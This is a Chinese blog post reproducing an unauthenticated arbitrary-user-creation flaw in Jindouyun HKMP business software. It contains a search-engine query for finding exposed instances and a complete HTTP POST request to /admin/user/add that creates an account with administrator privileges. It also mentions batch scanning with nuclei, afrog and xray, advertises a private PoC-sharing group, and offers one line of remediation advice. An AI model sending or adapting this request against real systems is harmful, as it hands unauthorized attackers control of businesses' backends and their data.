首页 > 其他分享 >【漏洞复现】金斗云 HKMP智慧商业软件 任意用户创建漏洞

【漏洞复现】金斗云 HKMP智慧商业软件 任意用户创建漏洞

时间:2024-07-03 20:57:22浏览次数:26  
标签:zh 金斗 hkmp 漏洞 商业软件 admin

0x01 产品简介

金斗云智慧商业软件是一款功能强大、易于使用的智慧管理系统,通过智能化的管理工具,帮助企业实现高效经营、优化流程、降低成本,并提升客户体验。无论是珠宝门店、4S店还是其他零售、服务行业,金斗云都能提供量身定制的解决方案,助力企业实现数字化转型和智能化升级。帮助企业提升业绩、优化流程、降低成本,并增强客户体验。

0x02 漏洞概述

金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。

0x03 搜索引擎

body="金斗云 Copyright"

在这里插入图片描述

0x04 漏洞复现

POST /admin/user/add HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
 
{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"root1234","userName":"root1234","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}

在这里插入图片描述
使用创建的用户登录系统即可。

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

关闭互联网暴露免或接口设置访问权限

标签:zh,金斗,hkmp,漏洞,商业软件,admin
From: https://blog.csdn.net/m0_60571842/article/details/140161975

相关文章

  • Web安全基础学习:Python反序列化漏洞之pickle反序列化
    理论基础序列化与反序列化序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。序列化是指将对象或数据结构转换为字节流的过程。在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定......
  • CCProxy栈溢出漏洞
    CCProxy栈溢出漏洞一.漏洞发现CCProxy是一款代理服务器软件,不仅支持常见的HTTP和SOCKETS代理,而且支持FTP和Telnet协议。我们这次的漏洞就是在Telnet服务当中的。首先,使用ping指令进行大量输入,判断是否会出现栈溢出的情况,如果出现说明存在栈溢出的漏洞,并且可以进行利用。使用k......
  • [漏洞复现]Geoserver表达式注入致远程代码执行漏洞(CVE-2024-36401)
    觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。看到长亭昨晚发送的漏洞风险提示,我这边快马加鞭看看能不能赶上热度,payload就放在星球了,欢迎各位师傅来白嫖,看上眼的话可以留下试试。漏洞描述GeoServer是一个开源服务器,用于共享、处......
  • 瑞友天翼应用虚拟化系统SQL注入漏洞
    最近网上公开了一些瑞友天翼应用虚拟化系统的SQL注入漏洞,经过挖掘发现,还存在一些后台SQL注入漏洞。重点关注传入参数可控并且拼接到SQL语句中的代码。​getappicon​首先检测了登录状态,然后将通过GET获取到的参数id直接拼接到SQL语句中。GET/hmrao.php?s=/Admi......
  • 【漏洞复现】LiveGBS user/save 逻辑缺陷漏洞(CNVD-2023-72138)
    0x01产品简介LiveGBS是安徽青柿信息科技有限公司研发的一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。0x02漏洞概述LiveGBSuser/save接口处存在逻辑缺陷漏洞,未经身份验......
  • Openssh版本过低被扫出漏洞---Openssh修改版本号
    1.查看当前系统的ssh版本号ssh-Vsshd-V2.查看ssh和sshd的位置whichsshwhichsshd3.查看ssh版本号有关的字符串strings/usr/bin/ssh|grepOpenSSHstrings/usr/sbin/sshd|grepOpenSSH4.备份cp/usr/bin/ssh/usr/bin/ssh.bakcp/usr/sbin/ss......
  • nacos漏洞利用
    nacos概述Nacos致力于帮助您发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。简单来说nacos就是阿里开发的一个中间件,它主要提供三种功能:持久化节点注册,非持久化节点注册和配置管理。他里面包含大量的......
  • ruoyi漏洞利用
    1、ruoyi默认口令admin/admin123ruoyi/1234562、前端shiro反序列化版本过低,基本不能利用,使用反序列化工具不再过多介绍。3、任意文件读取Ruoyi<4.5.1GET/common/download/resource?resource=/profile/../../../../../../../{filename}4、SQL注入4-1、/system/role/l......
  • CentOS 7基于开源项目制作openssh9.8p1 rpm二进制包修复安全漏洞CVE-2024-6387 ——
    2024年7月1日,官方发布openssh9.8版本,修复了安全漏洞CVE-2024-6387。此处主要基于开源项目https://github.com/boypt/openssh-rpms.git制作,之前也有写过类似的文章,这里就不再赘述。CentOS5/6/7基于开源项目制作openssh9.6p1rpm包——筑梦之路_centos6openssh9.6rpm-CSD......
  • 详解Web应用安全系列(5)敏感数据泄露漏洞
    在最近几年,这是最常见的,最具影响力的攻击。这个领域最常见的漏洞是不对敏感数据进行加密。在数据加密过程中,常见的问题是不安全的密钥生成和管理以及使用弱密码算法,弱协议和弱密码。特别是使用弱的哈希算法来保护密码。在服务端,检测数据传输过程中的数据弱点很容易,但检测存储数据......